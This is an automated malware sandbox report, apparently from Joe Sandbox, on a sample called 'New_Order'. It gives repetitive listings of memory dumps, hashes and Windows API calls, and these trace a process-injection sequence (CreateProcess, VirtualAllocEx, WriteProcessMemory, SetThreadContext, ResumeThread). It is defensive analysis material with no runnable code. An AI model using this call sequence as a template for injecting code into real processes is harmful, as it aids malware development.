                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 35a914f85eeab1b0b463391c806d221b84a4afe5ea34f3f7ccef58bcee994aab
                                                                                                • Instruction ID: 92ea1bdad74985b7915a800da110fa093816e6b67a8cacdc538c8ac7402fea43
                                                                                                • Opcode Fuzzy Hash: 35a914f85eeab1b0b463391c806d221b84a4afe5ea34f3f7ccef58bcee994aab
                                                                                                • Instruction Fuzzy Hash: 8791BB70A105259BCB15DF2DC88067AFBF6EF89310B28C659D829DB299C734EC61DBD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0DF07016
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 4880e43859bfcc75aa83e505e55ffc19d955a7181c3e1268c52e7f5bf52e9d4c
                                                                                                • Instruction ID: 51c839617abc90096866a57c3166e9059c823129f7e104d0a3827f8e63163465
                                                                                                • Opcode Fuzzy Hash: 4880e43859bfcc75aa83e505e55ffc19d955a7181c3e1268c52e7f5bf52e9d4c
                                                                                                • Instruction Fuzzy Hash: 87914A71D002598FEF24DF68C841BEDBBB2BF48310F1485A9E809E7280DB75A995DF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00EE59C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: 2504875ed51937b54ecbab39bb690d54c2f21878f3c8fc7783b3efb9a136ee5b
                                                                                                • Instruction ID: 6108e16fc1fc099cd96e8107c61af95f9b324c1582a62aa8bf4f43dfba05d6b5
                                                                                                • Opcode Fuzzy Hash: 2504875ed51937b54ecbab39bb690d54c2f21878f3c8fc7783b3efb9a136ee5b
                                                                                                • Instruction Fuzzy Hash: 6F41D3B1C0075DCEDB24DFAAC885ADDBBB1BF44304F24816AD418BB251DB756946CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1087 ee5a84-ee5b14
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 842542e51d93f2c9228f4e23b035777314921b79f519ea360338857633974d5e
                                                                                                • Instruction ID: f7a2dfa8594daf7a53420d15357a651b5a56fcfa8edde97e0713ce7ccf36e6b5
                                                                                                • Opcode Fuzzy Hash: 842542e51d93f2c9228f4e23b035777314921b79f519ea360338857633974d5e
                                                                                                • Instruction Fuzzy Hash: 4931E0B2C04A8CCFDB20CBA9C8857EDBBF0EF51318F24915AC059AB251D776A906CF01
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00EE59C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: de1dd51468d9d9f5bb6b377effccfd19eb909cb146d66869103757beef0addc1
                                                                                                • Instruction ID: 34d49131eb415bacb270779f70a667dafcece381741c7912b94e2a6fed6b5e9c
                                                                                                • Opcode Fuzzy Hash: de1dd51468d9d9f5bb6b377effccfd19eb909cb146d66869103757beef0addc1
                                                                                                • Instruction Fuzzy Hash: 8E41E1B1C0075DCBDB24DFAAC884ACDBBB5BF48308F24816AD408AB251DB756946CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0DF06BE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0DF06CC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessRead
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0DF06BE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0DF067DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00EED2C6,?,?,?,?,?), ref: 00EED387
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00EED2C6,?,?,?,?,?), ref: 00EED387
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0DF06CC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessRead
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0DF067DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0DF06B06
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00EEB101,00000800,00000000,00000000), ref: 00EEB312
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00EEB101,00000800,00000000,00000000), ref: 00EEB312
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0DF0944D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0DF0944D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost
                                                                                                • String ID:
                                                                                                • API String ID: 410705778-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00EEB086
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753301012.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e8d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753349297.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e9d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753349297.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e9d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753349297.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e9d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753301012.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e8d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753349297.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e9d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753301012.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e8d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1753301012.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_e8d000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:1.4%
                                                                                                Dynamic/Decrypted Code Coverage:1.8%
                                                                                                Signature Coverage:10.2%
                                                                                                Total number of Nodes:400
                                                                                                Total number of Limit Nodes:35

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • NtResumeThread.NTDLL(%o@,?,?,?,?), ref: 0040A4BD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID: %o@$%o@
                                                                                                • API String ID: 947044025-618112537
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,An@,00000000,?,?,08000000), ref: 0040A8F1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateSection
                                                                                                • String ID: An@
                                                                                                • API String ID: 2449625523-62601564
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040AD51
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00406E84,?,?,?,00000000), ref: 0040AB1D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SectionView
                                                                                                • String ID:
                                                                                                • API String ID: 1323581903-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040AF79
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B7FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2167126740-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • NtSetContextThread.NTDLL(?,?), ref: 0040A2AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ContextThread
                                                                                                • String ID:
                                                                                                • API String ID: 1591575202-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • NtDelayExecution.NTDLL(0041A421,?,?,?,00000000), ref: 0040B3CE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DelayExecution
                                                                                                • String ID:
                                                                                                • API String ID: 1249177460-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • NtSuspendThread.NTDLL(?,?), ref: 00409E8D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SuspendThread
                                                                                                • String ID:
                                                                                                • API String ID: 3178671153-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NtGetContextThread.NTDLL(?,?), ref: 0040A09D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ContextThread
                                                                                                • String ID:
                                                                                                • API String ID: 1591575202-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00417215
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Load
                                                                                                • String ID:
                                                                                                • API String ID: 2234796835-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NtClose.NTDLL(0041A3C8,?,?,00000000,?,0041A3C8,?,?,?,?,?,?,?,?,00000000,?), ref: 004281EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close
                                                                                                • String ID:
                                                                                                • API String ID: 3535843008-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(1f29T718,00000111,00000000,00000000), ref: 00413A3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 1f29T718$1f29T718
                                                                                                • API String ID: 1836367815-1459837916
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(1f29T718,00000111,00000000,00000000), ref: 00413A3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 1f29T718$1f29T718
                                                                                                • API String ID: 1836367815-1459837916
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(1f29T718,00000111,00000000,00000000), ref: 00413A3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
